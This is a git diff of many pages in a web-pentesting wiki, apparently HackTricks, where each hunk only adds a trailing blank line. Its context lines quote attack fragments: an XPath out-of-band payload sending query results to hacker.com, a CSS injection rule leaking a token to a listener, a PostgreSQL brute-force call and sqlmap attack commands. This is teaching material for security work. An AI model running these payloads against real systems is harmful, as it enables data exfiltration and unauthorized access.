diff --git a/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md b/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
index cdbae03f9..be4318369 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
@@ -83,3 +83,4 @@ It's noted that **large objects may have ACLs** (Access Control Lists), potentia
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md b/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
index 49c656f8f..70aedd7a5 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
@@ -9,3 +9,4 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md b/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
index 13fa353ef..d211b9e21 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
@@ -111,3 +111,4 @@ SELECT testfunc();
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md b/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
index 1156e4cf7..a761296e4 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
@@ -121,3 +121,4 @@ select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
index 7ecec13b0..a671e3d11 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
@@ -353,3 +353,4 @@ print("    drop function connect_back(text, integer);")
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
index aaa76de09..d6cae5dfb 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
@@ -324,3 +324,4 @@ rce-with-postgresql-extensions.md
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/sql-injection/sqlmap.md b/src/pentesting-web/sql-injection/sqlmap.md
index 8dc1431db..4d1ee6aa7 100644
--- a/src/pentesting-web/sql-injection/sqlmap.md
+++ b/src/pentesting-web/sql-injection/sqlmap.md
@@ -193,3 +193,4 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/sql-injection/sqlmap/README.md b/src/pentesting-web/sql-injection/sqlmap/README.md
index f5691a31d..c4cec1e2d 100644
--- a/src/pentesting-web/sql-injection/sqlmap/README.md
+++ b/src/pentesting-web/sql-injection/sqlmap/README.md
@@ -225,3 +225,4 @@ Remember that **you can create your own tamper in python** and it's very simple.
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md b/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
index 2c9a66bf0..16957afc2 100644
--- a/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
+++ b/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
@@ -79,3 +79,4 @@ sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/README.md b/src/pentesting-web/ssrf-server-side-request-forgery/README.md
index 8cc05227b..834ebe83d 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/README.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/README.md
@@ -382,3 +382,4 @@ SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP
 
 
 
+
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
index 626416241..7cdb561ae 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
@@ -659,3 +659,4 @@ Rancher's metadata can be accessed using:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md b/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
index 1f44877b4..522ebdfa4 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
@@ -7,3 +7,4 @@ Check **[https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.a
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
index 0bcfbdc5d..79b63fe79 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
@@ -223,3 +223,4 @@ image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md
index 42234bab3..dc06dcbe5 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/README.md
@@ -1108,3 +1108,4 @@ If you think it could be useful, read:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md b/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
index 8d8de12d6..3388d54a9 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
@@ -250,3 +250,4 @@ Check [https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/](https://h1pm
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md b/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
index ab945c4f6..fa32d8506 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
@@ -363,3 +363,4 @@ The request will be urlencoded by default according to the HTTP format, which ca
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/timing-attacks.md b/src/pentesting-web/timing-attacks.md
index a89b332be..049d28ca8 100644
--- a/src/pentesting-web/timing-attacks.md
+++ b/src/pentesting-web/timing-attacks.md
@@ -39,3 +39,4 @@ Once an scoped open proxy is discovered, it was possible to find valid targets b
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/unicode-injection/README.md b/src/pentesting-web/unicode-injection/README.md
index f1425a11b..7f88c964d 100644
--- a/src/pentesting-web/unicode-injection/README.md
+++ b/src/pentesting-web/unicode-injection/README.md
@@ -52,3 +52,4 @@ Emoji lists:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/unicode-injection/unicode-normalization.md b/src/pentesting-web/unicode-injection/unicode-normalization.md
index 5c63f5e38..365ba43cc 100644
--- a/src/pentesting-web/unicode-injection/unicode-normalization.md
+++ b/src/pentesting-web/unicode-injection/unicode-normalization.md
@@ -106,3 +106,4 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows t
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/uuid-insecurities.md b/src/pentesting-web/uuid-insecurities.md
index b4e668794..c0a863d1e 100644
--- a/src/pentesting-web/uuid-insecurities.md
+++ b/src/pentesting-web/uuid-insecurities.md
@@ -65,3 +65,4 @@ Imagine a web application that uses UUID v1 for generating password reset links.
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/web-tool-wfuzz.md b/src/pentesting-web/web-tool-wfuzz.md
index 132730fdf..1ebe4fca4 100644
--- a/src/pentesting-web/web-tool-wfuzz.md
+++ b/src/pentesting-web/web-tool-wfuzz.md
@@ -156,3 +156,4 @@ wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/web-vulnerabilities-methodology.md b/src/pentesting-web/web-vulnerabilities-methodology.md
index 21cd67d8f..acb1a63d8 100644
--- a/src/pentesting-web/web-vulnerabilities-methodology.md
+++ b/src/pentesting-web/web-vulnerabilities-methodology.md
@@ -131,3 +131,4 @@ These vulnerabilities might help to exploit other vulnerabilities.
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/web-vulnerabilities-methodology/README.md b/src/pentesting-web/web-vulnerabilities-methodology/README.md
index 3f2b8052e..c4a71d497 100644
--- a/src/pentesting-web/web-vulnerabilities-methodology/README.md
+++ b/src/pentesting-web/web-vulnerabilities-methodology/README.md
@@ -129,3 +129,4 @@ These vulnerabilities might help to exploit other vulnerabilities.
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/websocket-attacks.md b/src/pentesting-web/websocket-attacks.md
index f07643436..bdc090d89 100644
--- a/src/pentesting-web/websocket-attacks.md
+++ b/src/pentesting-web/websocket-attacks.md
@@ -175,3 +175,4 @@ h2c-smuggling.md
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xpath-injection.md b/src/pentesting-web/xpath-injection.md
index 366df9feb..c14e7b8ba 100644
--- a/src/pentesting-web/xpath-injection.md
+++ b/src/pentesting-web/xpath-injection.md
@@ -293,3 +293,4 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xs-search.md b/src/pentesting-web/xs-search.md
index edefc5bd3..4a7babf47 100644
--- a/src/pentesting-web/xs-search.md
+++ b/src/pentesting-web/xs-search.md
@@ -929,3 +929,4 @@ There are mitigations recommended in [https://xsinator.com/paper.pdf](https://xs
 
 
 
+
diff --git a/src/pentesting-web/xs-search/README.md b/src/pentesting-web/xs-search/README.md
index 4ad910682..673ae67b2 100644
--- a/src/pentesting-web/xs-search/README.md
+++ b/src/pentesting-web/xs-search/README.md
@@ -931,3 +931,4 @@ There are mitigations recommended in [https://xsinator.com/paper.pdf](https://xs
 
 
 
+
diff --git a/src/pentesting-web/xs-search/connection-pool-by-destination-example.md b/src/pentesting-web/xs-search/connection-pool-by-destination-example.md
index 7ec736258..9ea18a9a9 100644
--- a/src/pentesting-web/xs-search/connection-pool-by-destination-example.md
+++ b/src/pentesting-web/xs-search/connection-pool-by-destination-example.md
@@ -117,3 +117,4 @@ Let's see how this exploit work:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xs-search/connection-pool-example.md b/src/pentesting-web/xs-search/connection-pool-example.md
index 29144d8ec..4e70ac4e7 100644
--- a/src/pentesting-web/xs-search/connection-pool-example.md
+++ b/src/pentesting-web/xs-search/connection-pool-example.md
@@ -528,3 +528,4 @@ In the exploit you can see:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md b/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md
index 1be9f7dec..2110ed525 100644
--- a/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md
+++ b/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md
@@ -62,3 +62,4 @@ The following **script** taken from [**here**](https://blog.huli.tw/2022/05/05/e
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xs-search/css-injection/README.md b/src/pentesting-web/xs-search/css-injection/README.md
index 4f6533489..53a4f3a29 100644
--- a/src/pentesting-web/xs-search/css-injection/README.md
+++ b/src/pentesting-web/xs-search/css-injection/README.md
@@ -783,3 +783,4 @@ So, if the font does not match, the response time when visiting the bot is expec
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xs-search/css-injection/css-injection-code.md b/src/pentesting-web/xs-search/css-injection/css-injection-code.md
index 0d4b01211..1e6f0df55 100644
--- a/src/pentesting-web/xs-search/css-injection/css-injection-code.md
+++ b/src/pentesting-web/xs-search/css-injection/css-injection-code.md
@@ -282,3 +282,4 @@ input[value=]{list-style:url(http://localhost:5001/end?token=&)};
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md b/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
index 4fed2a941..6459c2c7b 100644
--- a/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
+++ b/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
@@ -156,3 +156,4 @@ Let's check the code:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xs-search/javascript-execution-xs-leak.md b/src/pentesting-web/xs-search/javascript-execution-xs-leak.md
index eb5849b07..5785ffcf0 100644
--- a/src/pentesting-web/xs-search/javascript-execution-xs-leak.md
+++ b/src/pentesting-web/xs-search/javascript-execution-xs-leak.md
@@ -73,3 +73,4 @@ Main page that generates iframes to the previous `/guessing` page to test each p
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md b/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
index d948f85e6..0859df7ef 100644
--- a/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
+++ b/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
@@ -105,3 +105,4 @@ In this challenge the user could sent thousands of chars and if the flag was con
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xs-search/performance.now-example.md b/src/pentesting-web/xs-search/performance.now-example.md
index a2cae506f..3ecaa992f 100644
--- a/src/pentesting-web/xs-search/performance.now-example.md
+++ b/src/pentesting-web/xs-search/performance.now-example.md
@@ -57,3 +57,4 @@ document.addEventListener("DOMContentLoaded", main)
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xs-search/url-max-length-client-side.md b/src/pentesting-web/xs-search/url-max-length-client-side.md
index d48ce87ca..1b4697e65 100644
--- a/src/pentesting-web/xs-search/url-max-length-client-side.md
+++ b/src/pentesting-web/xs-search/url-max-length-client-side.md
@@ -75,3 +75,4 @@ if __name__ == '__main__':
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md b/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
index b618d205d..dbe25179b 100644
--- a/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
+++ b/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
@@ -429,3 +429,4 @@ version="1.0">
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/README.md b/src/pentesting-web/xss-cross-site-scripting/README.md
index f748828e5..86cdd77a6 100644
--- a/src/pentesting-web/xss-cross-site-scripting/README.md
+++ b/src/pentesting-web/xss-cross-site-scripting/README.md
@@ -1745,3 +1745,4 @@ other-js-tricks.md
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md b/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md
index 7d1cf34df..5f245b5d2 100644
--- a/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md
+++ b/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md
@@ -109,3 +109,4 @@ For an example of this check the reference link.
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md b/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md
index 5860234e2..debd6a8c8 100644
--- a/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md
+++ b/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md
@@ -29,3 +29,4 @@ For further details on bfcache and disk cache, references can be found at [web.d
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md b/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
index 1b76c6eb0..6bdb02631 100644
--- a/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
+++ b/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
@@ -32,3 +32,4 @@ This will **copy the JS file locally** and you will be able to **modify that cop
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md b/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md
index df1a52d22..7f72b67e7 100644
--- a/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md
+++ b/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md
@@ -251,3 +251,4 @@ It's possible to add **new entries inside a form** just by **specifying the `for
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-invader.md b/src/pentesting-web/xss-cross-site-scripting/dom-invader.md
index f022708c7..f9d87b5b0 100644
--- a/src/pentesting-web/xss-cross-site-scripting/dom-invader.md
+++ b/src/pentesting-web/xss-cross-site-scripting/dom-invader.md
@@ -91,3 +91,4 @@ In the previous image it's possible to see that DOM clobbering scan can be turne
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
index 27b3a385f..dbe0e534d 100644
--- a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
+++ b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
@@ -328,3 +328,4 @@ dom-clobbering.md
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md b/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
index 987c25e9c..364040ea3 100644
--- a/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
+++ b/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
@@ -167,3 +167,4 @@ Check the following pages:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md b/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md
index 691ae6f8e..e02d2e4ee 100644
--- a/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md
+++ b/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md
@@ -11,3 +11,4 @@ Check:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md b/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md
index 3d0d54ab2..81167d4c0 100644
--- a/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md
+++ b/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md
@@ -141,3 +141,4 @@ let config;` -
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md b/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
index 57606cc8d..6a4bcadb5 100644
--- a/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
+++ b/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
@@ -510,3 +510,4 @@ async function sleep(ms) {
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md b/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
index fde93ecd5..64262e4c0 100644
--- a/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
+++ b/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
@@ -7,3 +7,4 @@ Chec the post: [**https://portswigger.net/research/portable-data-exfiltration**]
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md b/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
index b19c23a19..02dc7d2a8 100644
--- a/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
+++ b/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
@@ -189,3 +189,4 @@ Capturing the **PDF response** with burp should also **show the attachment in cl
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md b/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md
index 14a5afd4f..069f56925 100644
--- a/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md
+++ b/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md
@@ -7,3 +7,4 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md b/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md
index dc59fb458..8e8fa406d 100644
--- a/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md
+++ b/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md
@@ -13,3 +13,4 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md b/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
index 3c097f2de..6ba71f2f2 100644
--- a/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
+++ b/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
@@ -42,3 +42,4 @@ Basically, the attack flow is the following:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/steal-info-js.md b/src/pentesting-web/xss-cross-site-scripting/steal-info-js.md
index 171de9b55..8f5fd84a4 100644
--- a/src/pentesting-web/xss-cross-site-scripting/steal-info-js.md
+++ b/src/pentesting-web/xss-cross-site-scripting/steal-info-js.md
@@ -220,3 +220,4 @@ window.onmessage = function (e) {
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md b/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
index d114bbe95..9ec7f48b6 100644
--- a/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
+++ b/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
@@ -171,3 +171,4 @@ _http://danlec_@.1 style=background-image:url(data:image/png;base64,iVBORw0KGgoA
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xssi-cross-site-script-inclusion.md b/src/pentesting-web/xssi-cross-site-script-inclusion.md
index 285fa9dc4..be1114ab2 100644
--- a/src/pentesting-web/xssi-cross-site-script-inclusion.md
+++ b/src/pentesting-web/xssi-cross-site-script-inclusion.md
@@ -100,3 +100,4 @@ Takeshi Terada's research introduces another form of XSSI, where Non-Script file
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/xxe-xee-xml-external-entity.md b/src/pentesting-web/xxe-xee-xml-external-entity.md
index 2f3ef6829..953454955 100644
--- a/src/pentesting-web/xxe-xee-xml-external-entity.md
+++ b/src/pentesting-web/xxe-xee-xml-external-entity.md
@@ -781,3 +781,4 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/physical-attacks/escaping-from-gui-applications/README.md b/src/physical-attacks/escaping-from-gui-applications/README.md
index ea262760c..e6f28cf61 100644
--- a/src/physical-attacks/escaping-from-gui-applications/README.md
+++ b/src/physical-attacks/escaping-from-gui-applications/README.md
@@ -276,3 +276,4 @@ These shortcuts are for the visual settings and sound settings, depending on the
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/physical-attacks/firmware-analysis/README.md b/src/physical-attacks/firmware-analysis/README.md
index 18c6e59fe..8006e5883 100644
--- a/src/physical-attacks/firmware-analysis/README.md
+++ b/src/physical-attacks/firmware-analysis/README.md
@@ -254,3 +254,4 @@ To practice discovering vulnerabilities in firmware, use the following vulnerabl
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/physical-attacks/firmware-analysis/bootloader-testing.md b/src/physical-attacks/firmware-analysis/bootloader-testing.md
index 1f97ce83f..04c704023 100644
--- a/src/physical-attacks/firmware-analysis/bootloader-testing.md
+++ b/src/physical-attacks/firmware-analysis/bootloader-testing.md
@@ -52,3 +52,4 @@ The following steps are recommended for modifying device startup configurations
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/physical-attacks/firmware-analysis/firmware-integrity.md b/src/physical-attacks/firmware-analysis/firmware-integrity.md
index 737b0e2bd..dcacf079e 100644
--- a/src/physical-attacks/firmware-analysis/firmware-integrity.md
+++ b/src/physical-attacks/firmware-analysis/firmware-integrity.md
@@ -35,3 +35,4 @@ If possible, vulnerabilities within startup scripts can be exploited to gain per
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/physical-attacks/physical-attacks.md b/src/physical-attacks/physical-attacks.md
index 7833ac84f..1b88255a6 100644
--- a/src/physical-attacks/physical-attacks.md
+++ b/src/physical-attacks/physical-attacks.md
@@ -57,3 +57,4 @@ A new BitLocker recovery key can be added through social engineering tactics, co
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/radio-hacking/README.md b/src/radio-hacking/README.md
index 8f95deb47..690b761df 100644
--- a/src/radio-hacking/README.md
+++ b/src/radio-hacking/README.md
@@ -3,3 +3,4 @@
 
 
 
+
diff --git a/src/radio-hacking/low-power-wide-area-network.md b/src/radio-hacking/low-power-wide-area-network.md
index 8ed0a5088..20da96512 100644
--- a/src/radio-hacking/low-power-wide-area-network.md
+++ b/src/radio-hacking/low-power-wide-area-network.md
@@ -16,3 +16,4 @@ Long Range (**LoRa**) it’s popular in multiple countries and has an open sourc
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md b/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md
index 9d5ea5114..75d4344cd 100644
--- a/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md
+++ b/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md
@@ -71,3 +71,4 @@ sudo bettercap --eval "ble.recon on"
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/radio-hacking/pentesting-rfid.md b/src/radio-hacking/pentesting-rfid.md
index 90273d6e6..1aa2689c9 100644
--- a/src/radio-hacking/pentesting-rfid.md
+++ b/src/radio-hacking/pentesting-rfid.md
@@ -99,3 +99,4 @@ Or using the **proxmark**:
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/README.md
index 3bec4cf45..a5bc60726 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/README.md
@@ -3,3 +3,4 @@
 
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md
index b0bab7933..29ac09bac 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md
